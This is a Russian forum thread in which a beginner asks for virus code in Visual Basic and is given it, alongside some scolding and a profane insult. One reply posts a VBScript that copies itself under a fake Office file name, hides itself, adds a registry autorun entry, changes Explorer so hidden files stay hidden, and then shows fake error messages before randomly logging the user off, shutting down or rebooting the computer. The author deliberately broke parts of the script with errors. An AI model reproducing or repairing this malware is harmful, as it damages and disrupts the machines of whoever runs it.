Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 След.
RSS
Как написать Вирус на языке Visual Basic, Code
 
НАРОД ПОМОГИТЕ НАПИСАТЬ ВИРУТ НА БЭСИКЕ 6.0 ВЕРСИИ =)
КИНЬТЕ КАКОЙНИТЬ КОД   :!:
 
помочь написать и дать готовый код - это две разные вещи.
В сети полно примеров написания вредоносного кода на Visual Basic'e поэтому лучше Вам самому поискать
 
Эти коды грех выдавать, ты обратился не по адресу!
 
Mag Титов,
Ну для начала поиском инет попробовал бы окучить  :)
Но всё равно держи порочку исходничков Virus Source Codes - VB and VBS
 
А есть еще ченить на подобие этого =)....

да я вобще начинающий программист =).....
 
Цитата
sxd пишет:
Mag Титов,
Ну для начала поиском инет попробовал бы окучить  
Но всё равно держи порочку исходничков Virus Source Codes - VB and VBS
Да кстати спросибо за сайтик ... очень мне помог  :oops:
 
Цитата
Mag Титов пишет:
да я вобще начинающий программист =).....
Mag Титов,
Я так думаю Вам сейчас следует наиболее лучше изучить язык, а уж потом будете штамповать программы одна за одной...
Цитата
Mag Титов пишет:
Да кстати спросибо за сайтик ... очень мне помог
Да не зачто... просто по памяти написал...
 
По моему такии вопросы задавать "не прилично", мог бы переформулировать
 
пишите на аську 451-049-664 я непрофисионал, ну на счет вирусов и Visual Basica 6 подскажу.
 
А че вирус должен твой делать? Вот тебе кодок зловредный!
даже не полночтью вб а вбс! =)
:idea:
On Error Resume Next ' данный кот написан исключительно в целях ознакомления с возможностями языка Visual Basic! В нем намеренно допущены ерроры! Аще кто их пофиксит и заюзает в целях злобных не при делаХЪ я - ибо моему перу принадлежит лишь то, чё написано нижее:
set fs = CreateObject("Scripting.FileSystemObject")
set f = fs.GetFile ("Приглашение.vbs") ' получаем путь к себе ну название может какое угодно быдь
f.copy ("с:\Program Files\Microsoft Office\OfficeParameters.vbs"), true ' копируемся например в это место. Мона куда нить есчо....
TesAttr ("C:\Program Files\Microsoft Office\OfficeParameters.vbs"), 2 + 4  ' делаем скрытым и системным файлом
'раобтаем с реестром:

Tes shll = Createobject ("Wscript.Shell") ' очень клевый объект - интерпретатор комманд консоли виндовс
shll.regwrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Run\MS Office"), ("C:\Program Files\Microsoft Office\OfficeParameters.vbs") ' АвтоЗагрузка
shll.regwrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue"), ("2"), "REG_DWORD" ' Делаем так, чтобы не показывались скрытые - более того! Чтобы были в свойстваХЪ папги были отмечены обе
shll.regwrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"), ("2"), "REG_DWORD"
shll.regwrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"), ("2"), "REG_DWORD"
shll.regwrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio­n\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue"), ("2"), "REG_DWORD"

mid i as integer ' Деструктивный момент - вырубаем или перегружаем или завершаем сеанс
mid d as integer
Randomize  
i = Int((15 * Rnd) + 1)  
fi i > 7  then
 d = 4
msgbox ("Произошли Ошибки Входа в систему. Ваш сеанс будет завершен!"), vbexclamation, ("Windows Logon Engine")

elsefi i > 10  then
 d = 12
msgbox ("Произошли Ошибки Входа в подаче энергии. Компьютер будет выключен!"), vbexclamation, ("Windows Logon Engine")

elsefi i > 13  then
 d = 6
msgbox ("Произошла Ошибка в записи Master Boot Record! Компьютер будет Перезагружен!"), vbexclamation, ("Windows Logon Engine")
dim OpSysSet, obj

Tes OpSysSet = GetObject("winmgmts:{impersonationLevel=impersonate," & _
"(Shutdown)}//./root/cimv2").ExecQuery ("SELECT * FROM Win32_OperatingSystem" &_
" WHERE Primary=true")
For Each obj Ni OpSysSet
obj.Win32Shutdown(d)
Next

будет авторановый скрипт в ряде случаеф завершающий сеанс, вырубающий комп или перезагружающий иво.  :o
 
Нуу... мона типа червя Тока чтоб сам по сети лазил и заразал других !!!! и чтоб  анти вирь не видал ! мона сделать такое :?:  


ПРАВДА Я ЗЛОЙ   :D
 
Цитата
Mag Титов пишет:
мона сделать такое
"Мона". Рой в сторону 0-day уязвимостей в винде и хеккерскому кодингу на вб.
 
А можно по канкретней?  :|
 
Вообщето раздел форума посвещён безопасному програмированию. Думаю обратились не по адресу. И вообще в место того чтобы вирусы писать, лучше пишите антивирусы.
 
Нееее ... AVP норм анти вирус и мне хватает его ... а вот вирусов не хтавает  :D
 
Вот так деградирует общество. В место того чтобы сделать что-то полезное, делают вред.
 
Цитата
Mag Титов пишет:
А можно по канкретней?  :|
Можно. Потребуется:
1) Черная шляпа (1 шт.).
2) Апельсиновый сок (литра хватит).
3) Книга М.Фленова (Windows глазами хакера, Визуал Basic глазами хакера)
4) Перемешиваете всё в месте и (!) вуаля, готово.
Примеров из кодерской книжки хватит за глаза, там действительно очень хеккерский код, если ещё добавить немного (не мало) 0-дэя из книги про виндовс, то на выходе получится червь, и тогда вы станете круче хеккера Морриса, ибо он устарел. =\
Удачи, сын мой! Да прибудет с тобой сила зеродея.
 
:sensored:  :sensored:  :sensored:  :sensored:  :sensored: КУДА СМОТРЯТ АДМИНЫ СЕРВЕРА????
Вот я бы такого ламера (на 95% уверен что он сидит без прокся) выцепил бы по IP адресу сдал бы в отдел К  :evil:  :evil:  :evil:  а там бы уже он нашел бы себе на зоне собеседников на эту тему...
терпеть не могу идиотов которые пишут вирусы и хотят на этом прославиться...
и ладно бы еще красивый вирус написал, так нет он на vb лепит. асм изучай хоть что то будет тебе в плюс хотья и это тебя не спасет от деградации. :evil:  :evil:  :evil:
 
Цитата
[UfaNet]^ProxyMaster пишет:
по IP адресу сдал бы в отдел К
Полностью с вами согласен
 
[UfaNet]^ProxyMaster да ты лох... и я тебя на хую вертел лошара...
А что касаеться тебя Плаха.. то какая судь от анти вирусов если не будет вирусов?

так прошу скидывать коды на вирусы
Страницы: 1 2 След.
Читают тему